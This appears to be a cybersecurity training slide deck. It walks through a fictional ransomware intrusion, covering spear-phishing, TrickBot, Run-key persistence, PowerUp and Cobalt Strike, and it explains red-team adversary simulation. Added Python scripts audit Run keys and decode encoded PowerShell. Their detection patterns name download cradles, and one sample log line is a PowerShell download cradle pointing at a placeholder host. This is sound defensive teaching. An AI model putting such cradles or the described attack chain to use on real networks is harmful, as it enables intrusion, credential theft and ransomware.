Module 01 RealAttackScenario

This document provides an overview of how to kickstart a cybersecurity career by learning about real cyber attacks and red teaming techniques through an online training course. The training course covers topics like malware analysis, fileless attacks, and Yara rules. It also demonstrates how to simulate advanced attacks by collecting adversary tactics and tools, developing an attack plan, and executing the plan using frameworks like Cobalt Strike and Caldera. The goal is to help security professionals better understand real attacks and strengthen defenses by testing detection and response capabilities through adversary simulation.

Uploaded by

Ayad Kamali
Kickstart Your Cybersecurity Career
By Amr Thabet
Let Me Introduce Myself
• My name is Amr Thabet
• I was working in Symantec for 3 years
• Now I’m working in Tenable (Nessus Scanner)
• Author of “Mastering Malware Analysis” book
• Speaker at DEFCON, Hack In Paris, VB Conference and others
What We’re Going to Cover in This Training
• Module 01: How Do Real Attacks Look? (Attacker’s Mindset)
• Module 02: How to Respond to These Attacks? (Defender’s Mindset)
• Module 03: Malware Analysis
• BONUS Module: Fileless Attacks, Ransomware & Yara Rules
Real Attack Scenario
Attacking Company X: The Actor
• A group of attackers decided to target Company X for financial gain
• Their plan is to steal sensitive information and sell it on underground forums
• Later, they will capitalize further with their ransomware.

Source: Kingspan.com (This picture is not of Company X; it is used for illustration only)
Attacking Company X: The Attack Process
The Goal of This Attack
• The ultimate goal for the attacker is to get a domain admin account.
• A Domain Admin has full access over the domain controller (DC) and all resources in the network
• From there, the attacker can reach most of the systems needed for accessing sensitive information
• It also gives good access to the servers and their backups for an effective ransomware encryption.
Attacking Company X: Reconnaissance
• In the first week, the attackers started mapping the employees of this organization.
• They collected their first name, last name, email, department and job position.
• All this info will help them deliver a highly targeted spear-phishing attack

• Spear-Phishing: the process of sending highly sophisticated and targeted emails that deceive the victim into trusting the sender and installing malware on his machine or providing sensitive information to the attacker
Planning the Attack: Server-Side vs Client-Side
• Server-side attacks (vulnerable ports or web attacks) seemed way more difficult for them
• Client-side attacks (like spear-phishing) are easier as they target the weakest link in the cybersecurity chain (humans)
The Planned Attack
Spear-Phishing Emails to Payroll
• After reconnaissance, the attackers started sending their well-crafted phishing emails
Spear-Phishing Malicious Attachment
• The malicious email included an Excel document attachment.
Spear-Phishing Malicious Attachment
• This malicious document included macro code that downloads and executes the TrickBot malware using PowerShell
They Got Their Foot in the Door
• One employee in payroll called David was tricked by this malicious document
• He downloaded the attachment and enabled the macro.
• The malicious document downloaded the TrickBot malware onto his machine
• It gave the attacker initial access into the company network
Maintaining Persistence
• The attacker doesn’t want the access only once, he wants it every day
• He wants to make sure his malware runs every time the system boots up.
• He used a well-known registry key called:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
• He added an entry with the file path of his malware
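The Run key above is one of the first places a responder checks. The script below is an added example (not from the slides or the training material) that audits the current user's Run entries the way a triage script would: on Windows it reads the real key through the standard `winreg` module, elsewhere it runs over a constructed sample. The entry names, paths and the base64 blob in the sample are made up; the heuristics (user-writable directories, script hosts, encoded or hidden-window PowerShell, a system binary name outside the Windows directory) are the assumptions it encodes.

```python
"""Audit HKCU Run-key entries for signs of user-level persistence.

Added example, not part of the original slides. On Windows it reads the
real key through winreg; elsewhere it runs over a constructed sample so
the triage logic can be exercised offline.
"""
import re

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Heuristic: directories a user-level dropper can write to. Program Files and
# System32 need admin rights, so legitimate software rarely auto-starts from these.
USER_WRITABLE = re.compile(
    r"\\(AppData\\Local\\Temp|AppData\\Roaming|Downloads|Users\\Public|ProgramData)\\",
    re.IGNORECASE,
)
# Script hosts / LOLBins a dropper uses to stage a second step from an autorun value.
SCRIPT_HOST = re.compile(
    r"\b(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|cmd)(\.exe)?\b",
    re.IGNORECASE,
)
# powershell -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"\s-e(c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}", re.IGNORECASE)
HIDE_ARGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-executionpolicy\s+bypass", re.IGNORECASE
)
# Names of Windows system processes; outside the Windows directory they are masquerading.
SYSTEM_NAMES = re.compile(r"\\(svchost|explorer|lsass|csrss|winlogon|services)\.exe\b", re.IGNORECASE)
WINDOWS_DIR = re.compile(r"\\Windows\\(System32|SysWOW64|explorer\.exe)", re.IGNORECASE)


def read_run_entries():
    """Windows only: return [(name, command)] from HKCU\\...\\Run via winreg."""
    import winreg  # ImportError on non-Windows platforms
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values under the key
                break
            entries.append((name, str(value)))
            index += 1
    return entries


def classify(command):
    """Return the list of reasons an autorun command looks suspicious (empty = nothing found)."""
    reasons = []
    if USER_WRITABLE.search(command):
        reasons.append("auto-start target lives in a user-writable directory")
    if SYSTEM_NAMES.search(command) and not WINDOWS_DIR.search(command):
        reasons.append("system binary name outside the Windows directory (masquerading)")
    if SCRIPT_HOST.search(command):
        reasons.append("value launches a script host / LOLBin instead of an application")
    if ENCODED_ARG.search(command):
        reasons.append("encoded PowerShell command line")
    if HIDE_ARGS.search(command):
        reasons.append("window-hiding or policy-bypass switches")
    return reasons


def audit(entries):
    """Map each flagged entry name to its reasons; clean entries are omitted."""
    findings = {}
    for name, command in entries:
        reasons = classify(command)
        if reasons:
            findings[name] = reasons
    return findings


# Constructed sample: two ordinary entries and two that mimic the story's persistence.
SAMPLE_ENTRIES = [
    ("OneDrive", r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),
    ("SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
    ("WinUpdate", r"C:\Users\david\AppData\Roaming\WinUpdate\svchost.exe"),
    # opaque placeholder blob, not a real payload
    ("Updater", "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
]

if __name__ == "__main__":
    try:
        entries = read_run_entries()
    except ImportError:
        entries = SAMPLE_ENTRIES  # not on Windows: fall back to the constructed sample
    for name, reasons in audit(entries).items():
        print(f"[!] {name}")
        for reason in reasons:
            print(f"    - {reason}")
```

The same checks apply unchanged to the HKLM Run key and the RunOnce keys; only `RUN_KEY` and the hive handle differ.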
Cyber kill chain
Three levels of privileges
• High Integrity: This is a full administrative access
• Medium Integrity: Standard User Access
• Low Integrity: Restricted User Access
Privilege Escalation
• He used PowerSploit, specifically a script called PowerUp.ps1, for privilege escalation
He Wants the Full Access
• He found a service with read/write permissions and modified it to run his malware instead.
• Now his malware runs as a service with administrative privileges
• He can now dump David’s credentials from memory and use his domain account to access other machines in the organization
Cyber kill chain
Network Discovery
• The attacker now wants to discover the network
• He runs AdFind.exe (Microsoft application) to explore the network around him.
Lateral Movement
• The attacker started to use David’s account to execute encoded PowerShell commands on other systems
• He installed a keylogger on multiple machines to steal credentials
• He installed Cobalt Strike BEACONs on different machines to control them
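Both the macro's PowerShell download stage and the encoded PowerShell commands used for lateral movement leave a process-creation record, and the encoding is reversible. The script below is an added example (not part of the slides) that decodes `-EncodedCommand` arguments from command-line log entries and flags the behaviours a responder cares about: download cradles, dynamic evaluation, and remote execution against other hosts. The log lines are constructed with a small encoder so the sample is self-contained; the indicator list and the hostname `FS01` are assumptions.

```python
"""Decode and triage PowerShell -EncodedCommand launches from process logs.

Added example, not part of the original slides. The log lines below are
constructed; in practice they would come from Sysmon event 1 / Security
event 4688 command lines collected in the SIEM.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Behaviours worth a second look once the script text is readable.
INDICATORS = {
    "download-cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|Net\.WebClient",
        re.IGNORECASE),
    "dynamic-eval": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "remote-exec": re.compile(r"Invoke-Command|Enter-PSSession|-ComputerName|\bwinrm\b", re.IGNORECASE),
    "nested-encoding": re.compile(r"FromBase64String", re.IGNORECASE),
    "in-memory-load": re.compile(r"\[Reflection\.Assembly\]::Load|VirtualAlloc", re.IGNORECASE),
}


def encode_ps(script: str) -> str:
    """Encode the way PowerShell expects (UTF-16LE, then base64); used here only to build the sample log."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str):
    """Reverse of encode_ps; returns None when the blob is not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(command_line: str) -> dict:
    """Decode the encoded command (if any) and list the indicators found in the script text."""
    match = ENC_FLAG.search(command_line)
    decoded = decode_ps(match.group(1)) if match else None
    # Fall back to the raw command line when nothing was encoded (or decoding failed).
    text = decoded if decoded is not None else command_line
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(text)]
    return {"encoded": match is not None, "decoded": decoded, "indicators": hits}


def scan_log(lines):
    """Return (index, indicators, decoded script) for each line that tripped at least one indicator."""
    hits = []
    for index, line in enumerate(lines):
        result = triage(line)
        if result["indicators"]:
            hits.append((index, result["indicators"], result["decoded"]))
    return hits


# Constructed sample log (command-line field only).
SAMPLE_LOG = [
    # an admin running an inventory script from disk
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    # a harmless encoded command; some management tooling launches this way
    "powershell.exe -enc " + encode_ps("Get-Date"),
    # a download cradle of the kind the macro in the story used (hostname is a placeholder)
    "powershell.exe -w hidden -NoP -ec "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://stage.example/x.ps1')"),
    # remote execution on another host with the stolen account
    "powershell.exe -EncodedCommand "
    + encode_ps("Invoke-Command -ComputerName FS01 -ScriptBlock { whoami }"),
]

if __name__ == "__main__":
    for index, indicators, decoded in scan_log(SAMPLE_LOG):
        print(f"line {index}: {', '.join(indicators)}")
        print(f"    {decoded}")
```

Encoding alone is not an indicator (line 1 of the sample decodes to `Get-Date` and is left alone); the value is in reading the decoded text, which is also where keyword-based detections that only look at the raw command line are blind.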
Lateral Movement
• This tool helps the attacker control lots of machines at once
• It allows disguising the internet communications
• It can make them look like legitimate connections
• It allows peer-to-peer communication
• It allows sending commands through multiple hops
Domain Administrator
• One of the machines had an IT Support RDP session’s credentials in memory
• The IT Support terminated the RDP connection in a wrong way that kept the credentials in memory
• The attacker got the credentials and moved to the Domain Controller
• From the Domain Controller, he was able to get all users’ credentials and access to all important servers and sensitive information
Cyber kill chain
Exfiltration
• The attacker started exfiltrating lots of information and source code from the organization’s systems and shared resources
• The attacker got access to backups as well as the main servers
• After the exfiltration, the attacker decided to encrypt all the servers and the backups so he can force the organization to pay the ransom
• He installed his ransomware everywhere and made it run over the weekend.
The Attack Lifecycle
So, What’s Cyber Kill Chain?

“The cyber kill chain is a series of steps that trace stages of a cyberattack from the early reconnaissance stages to the exfiltration of data. The kill chain helps us understand and combat ransomware, security breaches, and advanced persistent attacks (APTs).”
Cyber kill chain
MITRE ATT&CK
MITRE ATT&CK: Sub-Techniques
Advanced Red Teaming: Real Attack Simulation
Penetration Testing vs Real Attack Simulation
• Pentesting is noisy and doesn’t test blue team monitoring and detection capabilities.
• Pentesting is not intelligence driven
• Pentesting might lead the company to focus on patching the less important vulnerabilities
• Real attack simulation tests the company’s security against the type of techniques it might face
• Real attack simulation tests not only the controls but the security teams themselves
Adversary Simulation Steps
1. Collect all the adversaries that might target your organization
2. Collect all the tactics, techniques and procedures (TTPs) these attackers used (their behavior, not their exact commands)
3. Set your adversary simulation plan
4. Prepare your tools arsenal (from publicly available tools to customized private tools).
5. Execute the simulation and report the weaknesses
Step 1: Collect Adversaries
• This step is done by using threat intelligence info.
• Understand who is targeting your country, your sector and organizations similar to yours.
Step 2: Collect Their TTPs
Step 3: Adversary Simulation Plan
Step 4: Prepare your Arsenal
• You can use publicly available tools like Metasploit or Empire (easier to detect)
• You can use privately available tools like Cobalt Strike or Cymulate (not too hard to detect)
• You can develop your own tools with unknown signatures and customized network communication (hard to detect)
Step 5: Execute the Attack
Resources:
• Check the MITRE ATT&CK APT3 Simulation
https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf
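Steps 1 to 3 above (collect adversaries, collect their TTPs, set the plan) boil down to a prioritization: which techniques appear across the most relevant adversaries and are not yet exercised by existing detections. The script below is an added example (not part of the slides or the MITRE plan linked above) that carries a constructed threat-intelligence result through that prioritization. The ATT&CK technique IDs and names are real Enterprise entries; the three adversary groups, their technique sets and the blue team's claimed coverage are made up for the example.

```python
"""Turn adversary TTPs into a prioritized adversary-simulation plan.

Added example, not part of the original slides. The adversary -> technique
mapping and the coverage set are constructed stand-ins for the output of
the threat-intelligence step; the ATT&CK IDs themselves are real.
"""
from collections import Counter

# Step 1 + 2 output (constructed): adversaries relevant to the organization
# and the ATT&CK Enterprise techniques reported for each of them.
ADVERSARY_TTPS = {
    "Group A": {"T1566.001", "T1204.002", "T1059.001", "T1547.001", "T1003.001", "T1021.001", "T1486"},
    "Group B": {"T1566.001", "T1059.001", "T1574.010", "T1087.002", "T1021.001", "T1041"},
    "Group C": {"T1190", "T1059.001", "T1003.001", "T1041"},
}

TECHNIQUE_NAMES = {
    "T1566.001": "Phishing: Spearphishing Attachment",
    "T1204.002": "User Execution: Malicious File",
    "T1059.001": "Command and Scripting Interpreter: PowerShell",
    "T1547.001": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder",
    "T1003.001": "OS Credential Dumping: LSASS Memory",
    "T1021.001": "Remote Services: Remote Desktop Protocol",
    "T1574.010": "Hijack Execution Flow: Services File Permissions Weakness",
    "T1087.002": "Account Discovery: Domain Account",
    "T1041": "Exfiltration Over C2 Channel",
    "T1486": "Data Encrypted for Impact",
    "T1190": "Exploit Public-Facing Application",
}

# Techniques the blue team already believes it detects (constructed).
DETECTION_COVERAGE = {"T1566.001", "T1190", "T1486"}


def prioritise(adversary_ttps, coverage):
    """Rank techniques: untested before covered, then by number of adversaries using them, then by ID."""
    counts = Counter(tid for ttps in adversary_ttps.values() for tid in ttps)
    ranked = sorted(counts.items(), key=lambda item: (item[0] in coverage, -item[1], item[0]))
    return [(tid, count, tid in coverage) for tid, count in ranked]


def build_plan(adversary_ttps, coverage, max_techniques=5):
    """Step 3: the top untested techniques become the simulation plan."""
    untested = [tid for tid, _, covered in prioritise(adversary_ttps, coverage) if not covered]
    return untested[:max_techniques]


def simulated_share(adversary_ttps, coverage, plan):
    """Fraction of each adversary's known techniques that the plan plus existing coverage exercises."""
    exercised = set(plan) | set(coverage)
    return {adv: len(ttps & exercised) / len(ttps) for adv, ttps in adversary_ttps.items()}


if __name__ == "__main__":
    plan = build_plan(ADVERSARY_TTPS, DETECTION_COVERAGE)
    print("Simulation plan (behaviour to emulate, not the adversaries' exact commands):")
    for tid in plan:
        print(f"  {tid}  {TECHNIQUE_NAMES[tid]}")
    for adv, share in simulated_share(ADVERSARY_TTPS, DETECTION_COVERAGE, plan).items():
        print(f"{adv}: {share:.0%} of known techniques exercised")
```

Ranking by adversary count puts PowerShell execution and credential dumping at the top because every group in the sample relies on them, which is the "techniques it might face" argument from the previous slide expressed as data; the share report shows whether a plan of five techniques is enough to cover each adversary or whether `max_techniques` needs to grow.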
The Execution
The Attack Cycle

Source: public.navy.mil
Initial Access – Spear-phishing Demo
• Demo Example: Malicious Document With Macro
APT/Adversary Simulation Frameworks
• Caldera: A cyber security framework designed to easily run autonomous breach-and-simulation exercises. It can also be used to run manual red-team engagements or automated incident response. (Free)
• Cobalt Strike: Software for Adversary Simulations and Red Team Operations (Paid)
Other Useful Frameworks
• Empire: post-exploitation framework (No longer supported)
• BloodHound: BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify.
Caldera - Demo
• Post-Exploitation with Caldera Demo
Additional Resources
Advanced Penetration Testing Book
• Advanced Penetration Testing: Hacking the World’s Most Secure Networks
Others
• MITRE ATT&CK References:
https://attack.mitre.org/techniques/enterprise/
• Caldera Plugins at:
https://github.com/mitre/caldera/tree/master/plugins
